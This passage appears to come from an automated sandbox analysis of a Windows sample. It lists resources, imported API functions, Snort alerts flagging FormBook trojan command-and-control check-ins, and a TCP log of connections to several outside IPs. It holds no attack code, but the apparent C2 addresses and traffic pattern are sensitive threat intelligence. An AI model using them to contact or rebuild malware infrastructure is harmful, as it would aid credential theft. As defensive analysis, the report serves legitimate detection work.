                                                                                                                        RT_ICON0x2d2800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 4724 x 4724 px/mEnglishUnited States
                                                                                                                        RT_ICON0x3daa80x4b6ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                        RT_ICON0x426180x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 4724 x 4724 px/mEnglishUnited States
                                                                                                                        RT_ICON0x468400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 4724 x 4724 px/mEnglishUnited States
                                                                                                                        RT_ICON0x48de80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 4724 x 4724 px/mEnglishUnited States
                                                                                                                        RT_ICON0x49e900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 4724 x 4724 px/mEnglishUnited States
                                                                                                                        RT_DIALOG0x4a2f80x100dataEnglishUnited States
                                                                                                                        RT_DIALOG0x4a3f80x11cdataEnglishUnited States
                                                                                                                        RT_DIALOG0x4a5180x60dataEnglishUnited States
                                                                                                                        RT_GROUP_ICON0x4a5780x5adataEnglishUnited States
                                                                                                                        RT_MANIFEST0x4a5d80x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                                                                                                        USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                        ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        192.168.2.593.179.127.2749736802031449 11/29/22-10:35:37.226497TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.593.179.127.27
                                                                                                                        192.168.2.5107.148.15.8149749802031453 11/29/22-10:36:16.701501TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.5107.148.15.81
                                                                                                                        192.168.2.5107.148.15.8149749802031412 11/29/22-10:36:16.701501TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.5107.148.15.81
                                                                                                                        192.168.2.593.179.127.2749736802031453 11/29/22-10:35:37.226497TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.593.179.127.27
                                                                                                                        192.168.2.5107.148.15.8149749802031449 11/29/22-10:36:16.701501TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.5107.148.15.81
                                                                                                                        192.168.2.593.179.127.2749736802031412 11/29/22-10:35:37.226497TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.593.179.127.27

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 29, 2022 10:34:27.048527956 CET4971180192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:34:27.065722942 CET8049711188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:27.065875053 CET4971180192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:34:27.138349056 CET4971180192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:34:27.155550957 CET8049711188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:27.527229071 CET8049711188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:27.581789970 CET4971180192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:34:27.746809959 CET8049711188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:27.746951103 CET4971180192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:34:27.747056961 CET4971180192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:34:27.763880968 CET8049711188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:32.948474884 CET4971380192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:33.073626041 CET8049713192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:33.073754072 CET4971380192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:33.073966026 CET4971380192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:33.199038029 CET8049713192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:33.208233118 CET8049713192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:33.208273888 CET8049713192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:33.208291054 CET8049713192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:33.208312035 CET8049713192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:33.208324909 CET8049713192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:33.208365917 CET4971380192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:33.208442926 CET4971380192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:34.135485888 CET4971380192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:35.153863907 CET4971480192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:35.277013063 CET8049714192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:35.277270079 CET4971480192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:35.314305067 CET4971480192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:35.437031031 CET8049714192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:35.449829102 CET8049714192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:35.449894905 CET8049714192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:35.449937105 CET8049714192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:35.449982882 CET8049714192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:35.450016975 CET8049714192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:35.450097084 CET4971480192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:35.450154066 CET4971480192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:36.332655907 CET4971480192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.349132061 CET4971580192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.474024057 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.474205017 CET4971580192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.474416971 CET4971580192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.599165916 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611229897 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611268044 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611294031 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611318111 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611341000 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611363888 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611397982 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611421108 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611470938 CET4971580192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.611489058 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611512899 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611548901 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:37.611562014 CET4971580192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.611613989 CET4971580192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.611634016 CET4971580192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.611891031 CET4971580192.168.2.5192.185.90.105
                                                                                                                        Nov 29, 2022 10:34:37.737736940 CET8049715192.185.90.105192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:42.668643951 CET4971680192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:42.685606003 CET8049716172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:42.685733080 CET4971680192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:42.685957909 CET4971680192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:42.703064919 CET8049716172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:43.030292988 CET8049716172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:43.030323029 CET8049716172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:43.030469894 CET4971680192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:43.030601025 CET8049716172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:43.030718088 CET4971680192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:43.692905903 CET4971680192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:44.720374107 CET4971780192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:44.737757921 CET8049717172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:44.737936020 CET4971780192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:44.738449097 CET4971780192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:44.755218029 CET8049717172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:45.082472086 CET8049717172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:45.082529068 CET8049717172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:45.082606077 CET8049717172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:45.082668066 CET4971780192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:45.082818985 CET4971780192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:45.739542007 CET4971780192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:46.756083965 CET4971980192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:46.773236036 CET8049719172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:46.774192095 CET4971980192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:46.780267000 CET4971980192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:46.797194004 CET8049719172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:47.155785084 CET8049719172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:47.155965090 CET8049719172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:47.156471014 CET4971980192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:47.156668901 CET4971980192.168.2.5172.67.214.243
                                                                                                                        Nov 29, 2022 10:34:47.173491955 CET8049719172.67.214.243192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:52.715010881 CET4972080192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:52.743273973 CET8049720206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:52.743366957 CET4972080192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:52.743576050 CET4972080192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:52.771430969 CET8049720206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:52.781203032 CET8049720206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:52.781259060 CET8049720206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:52.781282902 CET8049720206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:52.781383991 CET4972080192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:53.802419901 CET4972080192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:54.819032907 CET4972180192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:54.846424103 CET8049721206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:54.846532106 CET4972180192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:54.846709967 CET4972180192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:54.873783112 CET8049721206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:54.881488085 CET8049721206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:54.881524086 CET8049721206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:54.881535053 CET8049721206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:54.881772995 CET4972180192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:55.849965096 CET4972180192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:56.866463900 CET4972280192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:56.894402981 CET8049722206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:56.894694090 CET4972280192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:56.894845009 CET4972280192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:56.922574997 CET8049722206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:56.929251909 CET8049722206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:56.929332972 CET8049722206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:56.929378986 CET8049722206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:56.929507017 CET4972280192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:56.929507971 CET4972280192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:56.929670095 CET4972280192.168.2.5206.83.40.92
                                                                                                                        Nov 29, 2022 10:34:56.957391024 CET8049722206.83.40.92192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.105195045 CET4972380192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:02.216689110 CET8049723216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.216816902 CET4972380192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:02.217142105 CET4972380192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:02.381525993 CET8049723216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.388256073 CET8049723216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.388307095 CET8049723216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.388331890 CET8049723216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.388351917 CET8049723216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.388379097 CET8049723216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.388400078 CET8049723216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:02.398580074 CET4972380192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:02.398580074 CET4972380192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:03.230329037 CET4972380192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:04.234051943 CET4972580192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:04.345635891 CET8049725216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:04.345851898 CET4972580192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:04.346040964 CET4972580192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:04.505157948 CET8049725216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:04.505189896 CET8049725216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:04.505208969 CET8049725216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:04.505228043 CET8049725216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:04.505243063 CET8049725216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:04.505259037 CET8049725216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:04.505358934 CET4972580192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:04.505399942 CET4972580192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:05.361804008 CET4972580192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:06.379292011 CET4972680192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:06.490854979 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.492324114 CET4972680192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:06.492492914 CET4972680192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:06.657532930 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.675761938 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.675852060 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.675920963 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.675976038 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.676039934 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.676086903 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.676121950 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:06.678569078 CET4972680192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:06.678849936 CET4972680192.168.2.5216.40.34.41
                                                                                                                        Nov 29, 2022 10:35:06.790359020 CET8049726216.40.34.41192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:11.953933954 CET4972780192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:12.115489960 CET804972738.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:12.115825891 CET4972780192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:12.158039093 CET4972780192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:12.320441008 CET804972738.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:12.320492029 CET804972738.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:12.320602894 CET4972780192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:13.158677101 CET4972780192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:14.175110102 CET4972880192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:14.336442947 CET804972838.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:14.336633921 CET4972880192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:14.336776018 CET4972880192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:14.498594046 CET804972838.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:14.498656034 CET804972838.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:14.498881102 CET4972880192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:15.346071959 CET4972880192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:16.362782955 CET4972980192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:16.524382114 CET804972938.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:16.524555922 CET4972980192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:16.524717093 CET4972980192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:16.686656952 CET804972938.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:16.686723948 CET804972938.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:16.686976910 CET4972980192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:16.687175989 CET4972980192.168.2.538.40.166.195
                                                                                                                        Nov 29, 2022 10:35:16.848613977 CET804972938.40.166.195192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:21.740703106 CET4973080192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:21.866847038 CET804973074.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:21.867130041 CET4973080192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:21.868138075 CET4973080192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:21.993962049 CET804973074.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:21.999813080 CET804973074.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:21.999855042 CET804973074.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:22.000035048 CET4973080192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:22.881061077 CET4973080192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:23.894221067 CET4973180192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:24.020740032 CET804973174.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:24.020886898 CET4973180192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:24.021054983 CET4973180192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:24.147279024 CET804973174.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:24.155739069 CET804973174.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:24.155781031 CET804973174.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:24.155910015 CET4973180192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:25.041604996 CET4973180192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:26.361058950 CET4973280192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:26.487149000 CET804973274.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:26.487303972 CET4973280192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:26.517757893 CET4973280192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:26.644310951 CET804973274.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:26.648845911 CET804973274.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:26.648896933 CET804973274.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:26.649097919 CET4973280192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:26.649233103 CET4973280192.168.2.574.208.236.65
                                                                                                                        Nov 29, 2022 10:35:26.775186062 CET804973274.208.236.65192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:32.122167110 CET4973480192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:32.471518993 CET804973493.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:32.472505093 CET4973480192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:32.472700119 CET4973480192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:32.821907043 CET804973493.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:32.821959019 CET804973493.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:32.822082043 CET4973480192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:33.488320112 CET4973480192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:33.837680101 CET804973493.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:34.504441977 CET4973580192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:34.851205111 CET804973593.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:34.852060080 CET4973580192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:34.852971077 CET4973580192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:35.199661970 CET804973593.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:35.199729919 CET804973593.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:35.199829102 CET4973580192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:35.863503933 CET4973580192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:36.210297108 CET804973593.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:36.879590034 CET4973680192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:37.226181030 CET804973693.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:37.226335049 CET4973680192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:37.226496935 CET4973680192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:37.572927952 CET804973693.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:37.573014021 CET804973693.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:37.573223114 CET4973680192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:37.573323011 CET4973680192.168.2.593.179.127.27
                                                                                                                        Nov 29, 2022 10:35:37.919848919 CET804973693.179.127.27192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:42.636575937 CET4973780192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:42.807785988 CET8049737198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:42.808262110 CET4973780192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:42.808341026 CET4973780192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:42.978910923 CET8049737198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:43.111404896 CET8049737198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:43.111449003 CET8049737198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:43.111531019 CET4973780192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:43.817267895 CET4973780192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:44.969733953 CET4973880192.168.2.5198.54.121.81
